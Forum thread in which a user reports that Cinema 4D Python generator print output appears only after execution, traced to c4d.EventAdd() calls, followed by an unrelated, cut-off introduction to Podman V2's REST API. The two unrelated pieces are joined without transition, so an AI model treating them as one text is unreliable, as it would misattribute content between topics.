To enable running functional tests from the command line, the following gradle command must be run before deploying dotCMS and building your Tomcat directory (using the
./gradlew deployWarTomcat command mentioned in the developing from source documentation):
./gradlew deployWarTomcatTests
Functional Test URLs
There are diferent ways to call the tests and, depending on the way they are called, the result will change as well. There are three parameters that can be passed to the test server:
Examples
class
method
resultType
Return Code
The test servlet will return one of two codes to indicate the status of the tests:
Sample Results
Plain Text
XML File
All Functional Tests Suite
The AllTestsSuite.java file contains the names of all the functional test Java classes. This file can be found in the /src/functional-test/java/com/ testing package.
Running the Suite
You may run the test suite in two ways:
- Use ant tasks:
- Execute the test-dotcms task of the build.xml.
- Make direct calls to the servlet:
- Execute the “deploy-tests” task of the build.xml
- Run the application
- Make the calls directly to the test servlet.
Adding Tests
You can add unit tests for your classes by adding entries for each class to the test module in the /test/ folder in your dotCMS build folder. This allow you to call your tests directly (specifying the class and/or test method).
If you wish for your tests to be run when the ALLTestsSuite is run, you must also add your tests to the main test suite.
The following shows the format of an entry for a test in the test module:
@RunWith ( Suite.class ) @Suite.SuiteClasses ( { FieldFactoryTest.class, StructureFactoryTest.class, ContentletFactoryTest.class, ContentletAPITest.class } ) public class AllTestsSuite { } | https://dotcms.com/docs/latest/functional-tests | CC-MAIN-2018-17 | refinedweb | 338 | 60.75 |
09 December 2011 07:08 [Source: ICIS news]
SINGAPORE (ICIS)--Asia’s naphtha prices will stay firm in December, supported by the expectations of fresh spot demand from ?xml:namespace>
In line with the strong prices, the naphtha spread between the contracts for the second half of January and the second half of February widened to $5.50/tonne (€4.13/tonne) in backwardation from parity a month ago, ICIS data showed.
The naphtha crack spread versus Brent crude futures nearly tripled from the levels seen in early November to above $90/tonne on the close of trade on 8 December, the data showed.
“The demand for heavy grade naphtha is strong and there isn’t much supply available,” a trader said, adding that the premium for heavier grade naphtha was more than $10/tonne.
Both
South Korea’s Honam Petrochemical bought 25,000 tonnes of naphtha for delivery into Daesan in the first half of January at a premium of $4/tonne to Japan quotes CFR (cost & freight) earlier in the week, while LG Chem subsequently bought supplies for delivery into Yeosu in the second half of January at a wider premium of $5/tonne, the traders said.
“Supply is tight for January, especially for the first half of the month,” a third trader added.
The rising naphtha prices in Asia, which increased to above the $900/tonne CFR Japan level seen this week, have sparked off a rally in the east-west spread, boosting the opening of the arbitrage window to bring in barrels from
The east-west spread strengthened to $21.72/tonne on 8 December from $21.02/tonne on the close of 7 December, the traders said. The spread was at $10.49/tonne four weeks ago, they added.
For December, around 150,000 tonnes of deep-sea Western naphtha will be shipped to
Meanwhile, a recovery in butadiene (BD) prices, which are supported by limited supply and production cuts, is boosting the naphtha market, the traders added.
Spot BD prices continued to increase, rising to above $2,100/tonne
The BD prices, which were assessed at $1,570-1,650/tonne CFR NE Asia four weeks ago, drew support from increased Chinese demand and limited availability.
The market is bracing for
FPCC has raised the operating rates at its three naphtha crackers to meet a stronger demand from its downstream derivative products. The company operates a 700,000 tonne/year No 1 cracker, a 1.03m tonne/year No 2 unit and a 1.2m tonne/year unit in Mailiao. “The market is hopeful,” a fourth trader said.
($1 = €0.75)
For more on butadiene and naphtha, | http://www.icis.com/Articles/2011/12/09/9515243/asia-naphtha-to-firm-on-fpcc-buying-hopes-firm-butadiene.html | CC-MAIN-2014-49 | refinedweb | 443 | 67.89 |
Sentient Computing Lab 116 116
dedair writes "From the people who brought you VNC, AT&T labs has been working on an ultrasonic location system that they use in their labs in Cambridge, Engalnd. It turns a whole building into a virtual computing center. No matter where you are in the building, your phone calls can be forwarded to you and with the use of VNC, your desktop is always in front of you. Pretty cool stuff with more details at their website."
Re:How does everyone else view VNC (Score:1)
Re:Olivetti on Discovery years ago (Score:1)
I can get my e-mail in the bathroom now.. (Score:1)
Re:Cool, so can I? (Score:1)
Ok, so I just made it up. Shoot me.
I don't like it (Score:1)
It even knows what shirt color you're wearing!! (Score:1)
Re:Uhmm... sentient? (Score:1)
Slashdot Spellchecker To Coming Online....? (Score:1)
C'mon, Hemos. If you had read your post even once before you submitted it you would've caught, "Engalnd".
the future is here (Score:1)
Of course, now my computer will start talking like Rudy and I'll never get any work done at all.
-Chris
...More Powerful than Otto Preminger...
Re:Bluetooth (Score:1)
The current versions for phones are not even capable to work without Line of Sight. If they require LOS then why not use IR instead? The more powerful versions will be able to penetrate clothing and such, but since they will draw more juice then will probably not be the ones used in the first products.
Furthermore it seems like Bluetooth has been stricken by a severe case of "design by committee". That is, it lost track of the technical applications and instead it's become a part for marketing.
And I can not understand why so many want Bluetooth as a NIC in a computer. If you want wireless LAN there are already a bunch of products based on IEEE802.11x on the market NOW! Why wait for Bluetooth? Sure, it's supposed to have really low power consumtion, but does it matter in a laptop with an LCD, harddrive and CD-Rom?
Finally, Bluetooth is a NETWORK layer. It's not a "end of all protocols magic wand" that some people seem to think. It will NOT make your homestereo talk with Mr Coffee. It will NOT allow you to program your VCR through the computer (or palmtop). It's just a stupid (in a protocolly-challenged way) network for crying out loud!
What you WANT is something like Jini from SUN. But a version that is actually available on the market. And need I say this an OPEN standard. Sony has already developed near magical things for their home entertainment systems, like S-Link and newer versions of it. But unless you are a member of the "Happy Sony Family" and only have their products on the shelf then it won't do diddly/squat. Why not let the customers use the API to create their own shortcuts in the home?
Re:AT&T Didn't give us VNC (Score:1)
Q I thought this was something to do with ORL? What's the Olivetti/Oracle link here?
A In January 1999, AT&T acquired ORL, the Olivetti Research Laboratory founded 12 years earlier, and recently jointly funded by Oracle, to create AT&T Laboratories Cambridge.
Here is the link for VNC
And the faq
KH-ing ?
Re:Typical, England brought you 1984, (Score:1)
Re:General pager/cell-phone rant response (Score:1)
Re:AT&T Didn't give us VNC (Score:1)
Re:AT&T Didn't give us VNC (Score:1)
Re:How does everyone else view VNC (Score:1)
(I'm only talking of doing admin on WinBoxes here), it's IMHO faster and more versatile than VNC, and offers a HUGE amount of other features such as a SSH telnet server, remote file manipulation, process level info, performance graph, etc...
So okay it's not free (as in Beer) like VNC, but is an outstanding product, they have a trial version, give it a spin.
Murphy(c)
Bit more detail (Score:1)
Don't know why this has suddenly appeared on
Re:Can you turn it off? (Score:1)
Re:Ensure Technologies (Score:1)
How do you solve that one? One idea was to have the ID in a ring so that it only picks you up when your hands go within ~20cm of the keyboard... with a suitable hystresis and a fast enough log in, this could work...
AT&T Didn't give us VNC (Score:1)
Just want to give credit where credit is due.
/
Privacy vs. Utility (Score:1)
The bat opens doors so you don't have to take your keys out; notifies you of email and phone calls, which you can then access at the nearest computer or phone; allows you to drop any of your VNC desktops onto the nearest workstation; allows you to determine when someone is in a meeting or on the phone and therefore saving you a fruitless walk over to their office; and so on.
And yes, it is fantastic watching everyone moving around on the magic map.
Rupert.
sounds nice but... (Score:1)
All I need now (Score:1)
Re:Can you turn it off? (Score:1)
although I understand that soem people do ever want anyone to know anything about them so maybe the original reply of mine was a little harsh
Jon
Re:Can you turn it off? (Score:1)
Technology for people who don't want to do anythin (Score:1)
The problem is you have to exit the entire building to leave "The System". Sorry, this virtual womb thing sounds fascinating and all, but like sometimes one needs to um exit, leave, depart, you know... breathe.
Course, we know why this is going to become more common. Consumers don't really want to go anywhere today. They just want less intrusion into their lives, least of all the sort of intrusion that requires them to put in some effort, which means more modern inconveniences will intrude. Imagine the shock of realizing they have no life once these inconveniences stop distracting them from the life they don't actually have.
As I always say, Big Brother is just a shadow cast by millions of little brethren.
Re:Typical, England brought you 1984, (Score:1)
Aldous Huxley wrote um Brave New World.
1984 is the work of Eric Blair aka George Orwell.
Re:On second thought Big Brother is a good thing (Score:1)
I'm not saying a contractor should get residual income from the hotel he's building, that's a separate enterprise which he has no legal claim to and should have no legal claim to.
But he should get paid more than the amount he gets to build a deck.
Re:Cool, so can I? (Score:1)
Nah. They don't have sensors in the bathrooms. Or PCs, for that matter.
Some of the guys in this lab supervise students here; a friend of mine turned up to a supervision and met his supervisor at the door - the supervisor had opened up a security camera display on his desktop and kept an eye out for him.
Another cool toy they've got is remote dial-in access to the security cameras from their cellphones: being geeks, they use it to check for parking spaces in the company car park before coming in
:-)
Sounds like a serious geek paradise, this place!
Re:Hemos sniffed Three Lines from the mirror (Score:1)
Rich
Why? (Score:1)
Re:Can you turn it off? (Score:1)
It does kind of look like someone was watching STNG for a little too long, which bugs me because on the USS 1701D You can just say "computer, locate my slacker employee" and it tells you what they're up to.
Yeah, but they fixed it in DS9 and VOY.
;) Now all you have to do is take off your com-badge and leave it in the restroom.
"Computer, locate ensign Kim."
"Ensign Kim is taking a dump and cannot be disturbed at this time."
Re:Can you turn it off? (Score:1)
and i`m getting subtle movements...its like hes moving, yet his location isnt changing...
funny (Score:1)
As a proof of concept, it's great. But personal freedom is a slippery slope. Once we start down the path, it's too easy to keep adding more monitoring.
On the other hand, NSA is just loving the possiblities with this!
How does everyone else view VNC (Score:1)
Re:Typical, England brought you 1984, (Score:1)
Huxley wrote 'Brave New World'
Re:Can you turn it off? (Score:1)
Re:Can you turn it off? (Score:1)
Re:Cool, so can I? (Score:1)
Re:AT&T Didn't give us VNC (Score:1)
-Ciaran
Re:Can you turn it off? (Score:1)
IIRC, there was some sort of light sensor on the badges that ensured they weren't active when, eg. in a desk drawer. It was possible to turn off the device simply by placing it in the dark.
-Ciaran
This is ANTI-Big brother.... (Score:1)
Re:Of course the real question here is... (Score:1)
Sean
Y'know what would be totally awesome? (Score:1)
"Ishpeck to bridge, we've got a subspace quazi-spectral anomoly here---I'd like to run a level one diagnostic on the ship's sensor array."
Re:Can you turn it off? (Score:1)
Bluetooth (Score:1)
Bluetooth will let PCs, PDAs, phones, printers, headsets, sensors all interact with each other in a PicoNet, which is a small personal area network. There are currently two cards available which support the Bluetooth 1.0/1.1 stack on Windows and Linux. They are made by Motorola and IBM.
Here [ibm.com] is a manual for IBM's bluetooth card if you want to take a look at the software and what Bluetooth is capable of.
Ericsson also makes a wireless Bluetooth headset that will attach itself as an audio device to your PC, cordless phone or mobile phone. You can leave your phone in your briefcase or in your living room and take a call in your office over your Piconet.
Pretty cool stuff, hopefully we'll see more in the way of innovation of Bluetooth in the next year.
-Pat
Ensure Technologies (Score:1)
It supports computer access control and tracking. XyLoc's full-time access control technology addresses the major vulnerability inherent in all existing security methods - they are gatekeepers that protect the information only at the point of entry: the initial logon process. Other security solutions are not "smart" enough to recognize that users are not in control of their computers at all times after logon After users have entered their password, inserted their token or placed their finger on the reader and they have been identified and authenticated, the gate is wide open and information assets are up for grabs the minute the user walks away from the PC.
XyLoc's operation is easy, transparent and automatic. XyLoc consists of a lock that is an ultra low-power wireless transceiver that attaches to the PC's serial, keyboard or USB (Universal Serial Bus) port. The XyLoc key is a battery-operated ultra low-power transceiver with a unique, encrypted user identification code that is worn or carried by an authorized user. The XyLoc lock and key are in constant, encrypted two-way wireless communication with each other, with the lock scanning for the presence or absence of authorized users. As the user approaches the PC, XyLoc identifies and authenticates the user, and unlocks the PC as appropriate. Then, if the user moves out of the active zone, XyLoc will automatically blank the screen, lock the keyboard and disable the mouse. The PC is instantly secured and remains so until an authorized user moves back inside the active zone. However, background tasks, such as printing and downloading, may continue while the PC is locked.
-Pat
Re:Didn't Xerox PARC do this first? (Score:1)
Re:Didn't Xerox PARC do this first? (Score:1)
Re:Can you turn it off? (Score:1)
As I recall, the badges were built from bits of TV remote. My favourite touch was the way they dealt with the collision of signals when multiple people were in the room -- instead of a random-wait-before-retry approach (ala Ethernet), each badge sent its hellos in the same interval, but using cheap (as in beer) parts that had significant variations in internal clock. Given a few minutes, the drift would eventually open a window.
I think the other part of it was that the interval was also proportional to the amount of light falling on a sensor, so yes, putting it in a drawer effectively turned it off (of course, it couldn't get an IR signal out through an opaque drawer anyway...)
The hard part is cultural, of course, so that people see it as a useful tool rather than a spy for an oppressive management. The environment they described sounded pretty techno-idylic -- I'd have strong doubts about this kind of system in a factory or even most offices.
Nerf wars will never be the same (Score:1)
Sounds like a legitimate business expense to me..
I can hear it now... (Score:1)
"ROGERS! Get the hell off the can! You've been in there for an *hour and a half*!"
--nick
Re:This is ANTI-Big brother.... (Score:1)
I figure as long as you aren't required to use it. There would be times in the day when I don't want anyone to follow me around as I'm pacing the halls tearing hair out because of a project that just isn't working. In which case, I leave the bat in my office and put a message or something on it "Storming around in anger, Please Do Not Disturb". Problem solved.
Does This Mean (Score:1)
"Me Ted"
So now we have bigger and better surveilance (Score:1)
Ideas are always great in themselves, it's only how we use them.
Cool, but... (Score:2)
Re:Cool, but... (Score:2)
Oh crap....that stupid bat must have fallen out of my pocket onto the floor of my office. Again.
Even better, hook it up to an RC car and race it through the halls. Your boss will think you really wanna get things done.
Stupid Monitoring Tricks (Score:2)
To a large extent cellphones with text-messaging & email gateways have replaced much of the functioniality (it's easier to reach us at our designated phone then have a nearby one ring for us plus we can accept/decline the call based on who it is and recieve simple text-messages.)
Corporate directory services & biometric logins have replaced another large part of the functioniality. It's not much more of a bother to stick one's thumb in the reader then to walk into the office & since the system was sometimes overzealous (I just walked in to talk, not to log out some poor coder halfway through a thought simply 'cause I was Sr.) this feature was soon turned off.
What's left is more of the Big-Brother people-tracking features that weren't so appreciated.
Frankly while I think it's a neat technology much of it will probably appear in a less-automated way. We'll be able to adjust common things using our phones / palmstops / whatever using a virtual dimmer / volume control / etc. and come up with a room consensus, or at least local variations. Secured doors will unlock automagically as we push against them instead of requiring an explicit keycard swipe.
But tracking, thanks, been there / done that / not interested.
Re:Olivetti on Discovery years ago (Score:2)
Phone transfers nothing new... (Score:2)
Olivetti on Discovery years ago (Score:2)
It's a pretty swell idea, you never miss phone calls. But then you can never AVOID phone calls either, which I guess would suck.
Re:AT&T Didn't give us VNC (Score:2)
what bennefit does it have over ssh + X11 forwarding? (besides running on windows)
Re:AT&T Didn't give us VNC (Score:2)
Re:Sun Microsystems has a similar system (Score:2)
Just yesterday our whole group went down to a test lab as a group to try a mass testing of our app where we were all together in one room at the same time. I used VNC to let us have access to the server to view logs and fix small problems while the test was in progress, really handy.
Also, at a local Sun campus things seem to work more that way. My friends there have permanent offices (well, as permanent as any office ever is!). They also have some of the exact same hosting cubes that the original poster described for employees visiting from other buildings or states to access thier desktop.
Re:Sun Microsystems has a similar system (Score:2)
I don't get the motivation behind hot-desking - it seems a really good way of demoralisng your entire workforce for very little gain. We're naturally territorial - as are most living things. The first thing anybody ever does is to define a bit of sapce in the world as their own by putting up pictures, unpacking their favourite coffee cup/stuffed lizard/electric pencil sharpner. Living in hotel rooms is miserable (even if your significant other is there too) simply because it's impersonal and dehuminising. Hot-desking is, for this reason alone, a really bad idea.
Interesting you're at Sun - another thing that didn't quite work out was the diskless computer. I wonder if part of this is for the same reason - I know you get your filestore, desktop and so on, but its still not your computer with its own local drive, humming power-supply fan, and (goddam it), smell.
Do you try to book the same cuboid every day?
Seems to know which way people are facing... (Score:2)
I wonder how much of this is inspired by cheap science fiction programs - all the user interfaces in Space 1999 were made out of paper too...
Can you turn it off? (Score:2)
#include "disclaim.h"
"All the best people in life seem to like LINUX." - Steve Wozniak
Yeah... (Score:2)
This was MANY years ago - at least 10 years ago. I remember seeing it while I was in high school. Only now are the pieces really falling into place.
I just wonder why it takes so damn long for these type things to catch on (like multimedia - started in the mid-80's with the Amiga, didn't become popular until the mid-90's with the PC).
Worldcom [worldcom.com] - Generation Duh!
Bell Labs has been doing this for some time... (Score:2)
...if I recall correctly. It might be somebody else, but I distinctly remember reading an article about this many years ago.
The one I remember works like this (I can't get to the linked article, bad network today). An embedded chip in the company ID badge serves as the locator, but only functions while on campus. When sombody dials "your" number, the system finds you, finds the telephone nearest to you, and rings that 'phone.
Like I say, this isn't new, but I cannot recall whether that place was Bell Labs or somewhere else. Almost certain it was Bell Labs. And, of course, that was only the telephone system -- nothing about VNC, etc, etc.
ugh! (Score:2)
The truth is, people don't like to be tracked, at home, or at work (privacy, anyone?) We reluctantly accept the fact that we have to wear badges to work, and scan into locked doors, et cetera, but I do not want my employer to have the ability to determine my physical location every second of the workday. $megacorp does have the right to make sure that I am being productive, but that can much more easily be done by using performance metrics (you pushed 4000 papers today!) and, ideally, with the employee's direct relationship to his/her supervisor.
Furthermore, tracking users is not "sentience." this is simply determining the presence or absence of a value given a location. Granted, they took a n additional step in making someones' computer profile follow them wherever they go, but even NT can do that! (to a much lesser extent, but still roaming profiles)
Re:Can you turn it off? (Score:2)
That being said, there's another issue of PHB policies of "from 9 to 5 don't even think about turning it off" etc. I'd say I'm more concerned about that then the actual device. Sort of like Mr. Spacely following George around the office. That would be the only reason I wouldn't one. Fortunately I don't work for Mr. Spacely.
"You'll die up there son, just like I did!" - Abe Simpson
On second thought Big Brother is a good thing (Score:2)
Well to be an employer man you gotta have money.
Cuz once you got money, all the wannabes will back you up no matter what shit you pull. If you can get away with it they figure someday they will too or they'll just invest in your little racket and profit regardless whether you ever get caught or not. If people can't control their spending, fuck it gimme every dime. Why? So I can buy a couple of public libraries, build a house on a mountain, grow a forest around it and make scary noises in the middle of the night to keep the fearful away.
Then I can go back to being a normal techie interested in learning and can keep the little brethren at arms length.
C'est la vive.
Re:AT&T Didn't give us VNC (Score:2)
It has a few disadvantages too. It's flaky on windows (Can't hook into the graphics context so has to take screen snapshots) and a bandwidth hog but remember, the task is not to find the "best" way to implement a user interface to a computer but the one most suitable for the job (I've found it a godsend when debugging keyboardless kiosk applications)
Rich
Sentient, yeah, right (Score:2)
Much more powerful people tracking systems exist. The prison industry is big on this stuff. This system [abscomtrak.com] has a particularly cool animated graphic.
The real utility here is to have a system where anybody can use any computer in an office and see their environment, just like the old dumb terminal days. Somebody should put that into a Linux distro. It would give Linux something that Windows doesn't have, and given Microsoft's pricing model for software, won't have.
Re:I don't like it (Score:2)
Re:Sentient, yeah, right (Score:2)
Get over your obligation to answer the phone... (Score:2)
When I get back to someone, I just say "Hi, I'm returning your call." I don't feel the need to explain why they got my voicemail, because I am not obligated to pick up the phone whenever it rings.
I guess I am pretty lucky in the workpace. I have told our CEO when he knocked on my door that I was in the middle of a design discussion, and could I catch him in his office in a little while? I can do that because he understands I have tasks to do, and wants me to do them effectively. Others' mileage may vary.
Re:Of course the real question here is... (Score:2)
Sean
Re:Of course the real question here is... (Score:2)
Sean
BFG in the ol' briefcase (Score:2)
Sean
A few thoughts.. (Score:2)
Dark Futures? (Score:2)
1) Lan intergration into houses was a routine low maintenance item
2) The Software for the servers were well maintained, and did not require the home owner to intervene
3) The home owner would be educated to not mess with the system (think of your usual riff-raff of corporate users. Now remember that a lot of these folks own homes.
4) The default failure mode for these system is not life threatening, but allows basic manual operation of things like heat, etc.
5) the home owner is sold on the idea that he never messes with the system.
6) The homes in a neighborhood and across the town and state, etc are integrated into a flawless system not subject to weather conditions, earthquakes, and other natural disaters.
7) Political parties would have to cooperate like factions of a mafia family, without greed, to make sure that the system is maintained in perfect harmony.
8) Commercial interests who want their fingers in the pie are kept in line
9) ETC.
Sounds easy to me
General pager/cell-phone rant (Score:2)
Seems like whenever there's an article that has something to with pagers or cell-phones, someone says something to the effect of "I don't carry any of these things because it's an intrusion of my privacy, and besides, I like interacting with people the old-fashioned way." Often, it's said in a holier-than-thou way that I find really annoying.
Now, I'm not accusing you (JJ) of saying this; the way I read your post, you were just stating your own opinion, which is quite fair enough. And you did add a bit about how you interact with your co-workers, which is positive for this discussion.
But all too often, people say things which basically boil down to "I don't like pagers and cell-phones!", which is not particularly insightful or illuminating. Giving a personal opinion is all well and good, but this opinion has already been said by zillions of people zillions of times, on Slashdot and in countless other forums. Why not try and add something more original to the discussion?
(After all, if you don't want to be disturbed, you can turn it off.)
Sorry for the slight rant.
(For the record, I don't carry a pager or a cell-phone, but I have nothing against them.)
--
Re:AT&T Didn't give us VNC (Score:2)
Besides, the Windows deal, X forwarding doesn't let you take control of a program session that's in the middle of being worked on. As such, the project mentioned here (namely, having your desktop follow you around from machine to machine automatically), Just Wouldn't Work with X forwarding.
Re:AT&T Didn't give us VNC (Score:2)
That still doesn't address the issue of your current desktop. My desktop is defined by both the programs that start up when I login, as well as the programs that I currently have up and running. Starting up a remote WM addresses the former, but it doesn't magicially transfer programs that're in the middle of running. If I were in the middle of reading Slashdot on one desktop, even if my desktop contained a thing to auto-start Netscape, I'd still have to manually renavigate to where I was on the site. (Score:2)
Overall - Pretty scary idea, how would you like the %time spent in the bathroom appearing on your performance review, or within 5ft of the printer, or 5ft within the coffee pot.
Does anyone have to say "Big Brother"?
I have this now (Score:2)
Re:I don't like it (Score:2)
No one intends to be "Overly Paranoid"
Re:Of course the real question here is... (Score:2)
This is why I don't own a cellphone (Score:2)
Of course the real question here is... (Score:2)
"Where's Jones?" my boss says as he walks down the hallway.
"Oh, I saw him in the cube farm. Look's like he's working on the 3d building graphics project."
Of course, the boss would never know that what I was really doing was waiting for him around the corner with the rocket launcher and a good ol' boom-stick as backup.
Uhmm... sentient? (Score:2)
While well programmed, this lab isn't sentient or even intelligent...
Re:ugh! (Score:2)
See, I'd qualify that. People don't like being tracked if it dosn't benefit them. Try to pass a law requiring GPS locators in cell phones and you'll have a war on your hands. Make nice nice and say it's really a measure that can allow you to be located if you've been in a car accident or some other dangerous altercation and no one (except us paranoid geeks) will even blink at it.
The fundamental difference is that you and I (and the majority of the Slashdot community) live in an environment where, for some reason or another, paranoia is rewarded, either by our peers or our employers (indirectly). Neal Stephenson does a good job with that concept in Cryptonomicon.
In the end though, we don't make up a substantial part of a voting block. So if "They" decide to really press this technology, there's little short of massed civil disobediance we can really do about it. On a corporate level it's a different story. Leave your "bat" in your cube. Clip your chip laiden ID to your coat and forget to take that with you to the bathroom. If even being in the system bothers you, just don't work there. This kind of thing has to be expensive as hell, not every corp can afford it.
Back to the basic point though. People like being tracked and monitored if they feel like they get something out of it. Why are websites that remember our personal information so successfull? Sure, it's a lesser manifestation of corporate tracking, but we --like-- that sort of personalization. The illusion that the computer remembers who we are and what we like and "cares" enough to make it that way (pretend you're a luser for a sec here ok?) makes the luser feel distinctive. It's a gimic, and it apeals to something deep within our psyche. It is, quite frankly, bunk... but it appeals to us anyhow.
Just be carefull before you say "the people won't stand for this" or "people don't like this" argument. In my experiance capitalism is a really good way for dealing with products no one likes. They don't sell and they die. If people really have as big a problem as you say with this the corporations that use it will flounder and die. The system will die with them and we'll all go home happy.
Ok... I'll shut up now.
This has been another useless post from....
Re:Sun Microsystems has a similar system (Score:2)
I wonder if part of this is for the same reason - I know you get your filestore, desktop and so on, but its still not your computer with its own local drive, humming power-supply fan, and (goddam it), smell.
Well, I have my own development server locked in a room somewhere. I can't hear or smell it, but it's still mine.
Do you try to book the same cuboid every day?
You can only reserve them for five days at a time so I mostly stay in once place all week. But I often don't get the same room. And some rooms are better than others. I can look down a long hallway at the moment, 45 degrees to me left. It's an annoying visual distraction. There's good sound-proofing though. The reservation system also has a few bugs so sometimes, there are collisions. I got bumped a couple weeks ago by another person while I was at lunch. We both had valid reservations. The most annoying thing, though, is that I can't keep my reference books handy. They have lockers (just like high school, no kidding) but that's annoying. And I also can't keep my small lego collection handy.
Not my Cup o' Tea (Score:3)
No slacking! (Score:3)
Also, I like the Sims-esque 3D image. I bet it's a farking blast to watch your coworkers on this thing in realtime.
Cool, so can I? (Score:4)
2) walk into a bathroom stall
3) use the terminal on the back of the door to start playing my newly downloaded song(s)
4) answer the phone there when the RIAA calls?
Big Brother vs. Enabling Technologies (Score:4)
I think this is a really interesting evolution of the smart-card identifier for terminals, creating a mobile desktop. This starts causing the environment to react to the specific presence of the user. From the JavaOne JavaRing demo of knowing what your coffee preference was, up to this system with speaker-specific transcription services, we may finally get to a technological workplace that enables us rather than causes us to conform to yet another interface.
And as the point to ponder, we are going to need to look at the intent more carefully in legislation. Is is now possible to profile people so completely via spending patterns, location, communication tendencies, etc. that unscrupulous corporation could manipulate trends in people reasonably easily. The laws need to adapt to prevent this misuse, and yet enable honest companies and people to provide legitimate, privacy-ensured services to people that want them without fear of this manipulation.
I'm not a lawyer, but that's how the laws started, was to uphold the moral views of the majority. It appears to me that we will need to return there soon, or we will be forced to forego these types of enabling technologies as are shown by AT&T and these other companies.
You wanna rant, do it offline.
You wanna think, do it here.
Re:AT&T Didn't give us VNC (Score:5)
The Olivetti and Oracle Research Labs were acquired by in January 1998 by AT&T Research to form AT&T Labs Cambridge. The same guys work there, doing the same research, under a different banner.
Perhaps moderators need a "This guy is well-meaning but misinformed" option, which demotes the comment, but doesnt detract from the guy's karma? Hmm...
Sun Microsystems has a similar system (Score:5) | http://news.slashdot.org/story/01/03/09/155233/sentient-computing-lab | CC-MAIN-2015-32 | refinedweb | 5,782 | 71.34 |
Welcome to the introduction to Kivy tutorial. First off, what is Kivy? Kivy is a multi-platform application development kit, using Python.
This means Kivy runs on iOS, Android, MacOS, Windows, and Linux! That's quite a bit! What's more is, not only does it run across the board like this, but you can also take advantage of multi-touch, which is common on mobile devices.
With Kivy, you can also access mobile APIs, like the Android API to manipulate things like the camera on a phone, the gyro sensor, GPS, vibrator, and so on.
I assume you already have Python. If you're new to Python, you should probably learn the basics of Python first.
Convinced? Great, let's get Kivy!
In order to use Kivy, you're going to also need PyGame, and likely Cython down the road, though we'll leave that out for now.
Since PyGame is a dependency of Kivy, we'll grab that first. PyGame is one of the original packages for creating games in Python. There is a PyGame tutorial seriers here on this website as well, if you are particularly interested in Game development.
In order to get PyGame, and then Kivy, we're going to use pip. So long as you have a recent version of either Python 2 or Python 3, you already have pip on your system. This tutorial is done with Python 3, though you should be able to follow along with Python 2.
Open bash or cmd.exe, and do:
pip install pygame
pip install kivy
That should be it. Are you having trouble with pip? I have a more in-depth tutorial on how to use pip and how to handle various things like 64 bit requirements and if pip is not in your path:
If you need help with pip, check out the pip tutorial.
Once you have Kivy installed successfully, you're ready to begin your first basic program!
Kivy handles a lot of the back-end requirements for you. For things like where the mouse is, how a button should react when clicked, or, even how to manage multiple screens, Kivy has your back!
from kivy.app import App kivy.require("1.8.0") from kivy.uix.label import Label
Kivy App import, followed by a requirement for a Kivy version. This isn't required, but necessary if you're using new features of Kivy. Finally, we pull Label from Kivy's UIX packages.
class SimpleKivy(App): def build(self): return Label(text="Hello World!")
Now we create our main application, called SimpleKivy. We're inheriting from Kivy's App class. Our build method is an expected method for Kivy. Within our build, we're just returning a simple Label, which is just displaying "Hello World."
Confused by "class" or Object Oriented Programming? OOP makes the most sense in most cases when creating things like interactive GUIs (graphical user interfaces) or Games. OOP can be a bit confusing, though it doesn't have to be! If you're confused about OOP, check out the Object Oriented Programming Crash Course.
if __name__ == "__main__": SimpleKivy().run()
Now we run the code. What does this if __name__ == "__main__" mean?
That's all there is to it. You should get the following when you run the application:
One of the things that makes Kivy a superb module is the documentation. Kivy offers documentation on their website which is very well done, but Kivy also has extensive commenting within the actual Python module itself. It might be the most documentation that I've ever seen. If you want to know, for example, what you can do with this "Label," why not check it out in the module? To do this, do you know where to look?
Third-party modules are *usually* stored in the /Lib/site-packages/ directory of your Python installation. If you're having trouble finding it, however, you can usually get by doing something like:
import kivy print(kivy.__file__)
That will give you the location of a module, which, for me, is:
C:\Python34\lib\site-packages\kivy\__init__.py
That's at least where the __init__.py is, but we're mostly interested in looking in the Kivy directory. Let's head there!
We see that we imported the "Label" from kivy.uix.label, so we can assume we'll find Label within kivy/uix/label.py.
Sure enough, there it is. Open it up to edit it, and just look at all those options...and all that commenting! Far more commenting than code. So, if you're interested in learning more about Kivy and the aspects of it, just browse your installation, or poke about their documentation!
For us, we're now ready to move on! | https://pythonprogramming.net/kivy-application-development-tutorial/ | CC-MAIN-2018-05 | refinedweb | 795 | 76.22 |
Console not updating anymore for debugging
On 29/04/2015 at 08:02, xxxxxxxx wrote:
Hi
This is an odd one.
Until just recently I would use the console to display data while executing a python generator script. I would have some loops with intensive cpu work going on - and I would update the console with some print commands to show where in the loop it is, and print other useful data. This would show me in realtime how the script is progressing as it's being executed.
But for some reason this has suddenly stopped. I now only get the print out of data in one lump sum after the script has completed, and not during execution. I can't remember changing any settings, or changing anything in my code that would cause it. Totally dumbfounded. Any help appreciated, thanks,
Glenn.
On 29/04/2015 at 08:24, xxxxxxxx wrote:
Hi Glenn,
just a wild guess...
Did you try to open a new scene with a new generator object and copy/paste the code.
A few days ago I had some issues with a generator, too and a new scene solved it.
Best wishes
Martin
On 29/04/2015 at 08:57, xxxxxxxx wrote:
Na, just tried that Martin - copied everything into a new scene file, created new generator.. no luck. strange one..
On 29/04/2015 at 11:10, xxxxxxxx wrote:
where is your print statement placed?
Is it after you return the cache? Did you handle the cache optimization by yourself?
A snippet will help to dive into.
Best wishes
Martin
On 29/04/2015 at 11:38, xxxxxxxx wrote:
just found the source of the problem - it's to do with the EventAdd lines I have in my code. Below I've recreated the problem - 'hit' is printed after the code has completely executed. Take out the eventadd line and it's printed half way through as expected.
import c4d
#Welcome to the world of Python
c = 0
for x in xrange(1000000) :
cube = c4d.BaseObject(c4d.Ocube)
if c==50000: print 'hit'
c += 1
c4d.EventAdd()
print 'done'
def main() :
return
On 30/04/2015 at 07:42, xxxxxxxx wrote:
Hello,
calling EventAdd() inside the loop does not make sense. This function adds an event to an event queue that is evaluated after your code is left. Also adding multiple events will result in only one update.
If the presence of EventAdd() influences the work of "print" it might be a bug. We will investigate.
Best wishes,
Sebastian
On 30/04/2015 at 08:36, xxxxxxxx wrote:
Thanks,
In my actual program (not the example above) the eventadd wasn't inside the loop - it was in the root level of the script after the loop had finished, but was still causing the problem. I needed the eventadd to update my scene after materials where added to objects. Anyway, I got around all this and things are working okay without eventadd anywhere, cheers. | https://plugincafe.maxon.net/topic/8674/11362_console-not-updating-anymore-for-debugging | CC-MAIN-2020-16 | refinedweb | 497 | 72.16 |
You may have heard that Podman V2 has a new RESTful API. This document demonstrates the API using code examples in Python and shell commands. Additional notes are included in the code comments. The provided code was written to be clear vs. production quality.
Requirements
- You have Python >3.4 installed.
- You have installed the Python requests library.
